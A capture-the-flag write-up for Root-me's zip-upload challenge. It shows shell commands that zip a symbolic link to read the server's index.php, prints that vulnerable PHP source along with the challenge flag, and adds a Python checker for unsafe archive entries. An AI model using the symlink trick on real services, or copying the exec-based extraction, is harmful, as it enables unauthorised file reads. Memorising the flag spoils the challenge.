Root-me: File Upload - Zip
Unsafe decompression
Our goal is to read the index.php file
The challenge page allows us to upload a zip file. I’ve encountered this before: the way to do it is to zip a symbolic link that points to the file we want to read.
We’ll upload a demo zip file to see where it gets uploaded first.
echo "yo" > txt
zip my.zip txt
We’ll upload my.zip. At the top of the page we can see that it is extracted to /web-serveur/ch51/tmp/upload/somerandomstring/. If we assume the challenge index.php is in /web-serveur/ch51/, the link needs to go up three directories.
ln -s ../../../index.php
mv index.php symb
zip -y my.zip symb
We’ll upload it and request the symb file.
curl http://challenge01.root-me.org/web-serveur/ch51/tmp/upload/somerandomstring/symb
<?php
if(isset($_FILES['zipfile'])){
if($_FILES['zipfile']['type']==="application/zip" || $_FILES['zipfile']['type']==="application/x-zip-compressed" || $_FILES['zipfile']['type']==="application/octet-stream"){
$uploaddir = 'tmp/upload/'.uniqid("", true).'/';
mkdir($uploaddir, 0750, true);
$uploadfile = $uploaddir . md5(basename($_FILES['zipfile']['name'])).'.zip';
if (move_uploaded_file($_FILES['zipfile']['tmp_name'], $uploadfile)) {
$message = "<p>File uploaded</p> ";
}
else{
$message = "<p>Error!</p>";
}
$zip = new ZipArchive;
if ($zip->open($uploadfile)) {
// Don't know if this is safe, but it works, someone told me the flag is N3v3r_7rU5T_u5Er_1npU7 , did not understand what it means
exec("/usr/bin/timeout -k2 3 /usr/bin/unzip '$uploadfile' -d '$uploaddir'", $output, $ret);
$message = "<p>File unzipped <a href='".$uploaddir."'>here</a>.</p>";
$zip->close();
}
else{
$message = "<p> Decompression Error </p>";
}
}
else{
$message = "<p> Error bad file type ! <p>";
}
}
?>
<html>
<body>
<h1>ZIP upload</h1>
<?php print $message; ?>
<form enctype="multipart/form-data" method="post" action>
<input name="zipfile" type="file">
<button type="submit">Submit</button>
</form>
</body>
</html>
We got the flag in there: it is in the comment above the exec() call.
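As an added example (not part of the original write-up or the challenge code), here is a Python check showing what the unzip call in the source never does: it inspects every archive entry and refuses symlink entries, absolute paths and ".." traversals before anything is extracted. The sample archives are constructed inline, and the mode values are standard Unix st_mode bits.

```python
import io
import stat
import zipfile


def unsafe_entries(zip_bytes):
    """Return reasons this archive must not be passed to 'unzip -d <dir>'.

    Symlink entries (the trick in this challenge), absolute names and
    '..' components can all make extraction reach outside the target dir.
    """
    reasons = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # The Unix mode of an entry lives in the upper 16 bits of external_attr.
            mode = (info.external_attr >> 16) & 0xFFFF
            if stat.S_ISLNK(mode):
                reasons.append(f"{info.filename}: symlink entry")
            name = info.filename.replace("\\", "/")
            if name.startswith("/"):
                reasons.append(f"{info.filename}: absolute path")
            if ".." in name.split("/"):
                reasons.append(f"{info.filename}: path traversal")
    return reasons


def build_zip(entries):
    """Constructed sample archive from a list of (name, data, mode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data, mode in entries:
            zi = zipfile.ZipInfo(name)
            zi.external_attr = (mode & 0xFFFF) << 16
            zf.writestr(zi, data)
    return buf.getvalue()


# Harmless upload, like the first test file in the write-up.
BENIGN = build_zip([("txt", b"yo\n", 0o100644)])
# A symlink entry: for a link, the entry data is the link target.
SYMLINK = build_zip([("symb", b"../../../index.php", 0o120777)])
# Same escape attempted with a plain traversal name instead of a link.
TRAVERSAL = build_zip([("../../../x", b"", 0o100644)])

if __name__ == "__main__":
    for label, z in [("benign", BENIGN), ("symlink", SYMLINK), ("traversal", TRAVERSAL)]:
        print(label, unsafe_entries(z) or "ok")
```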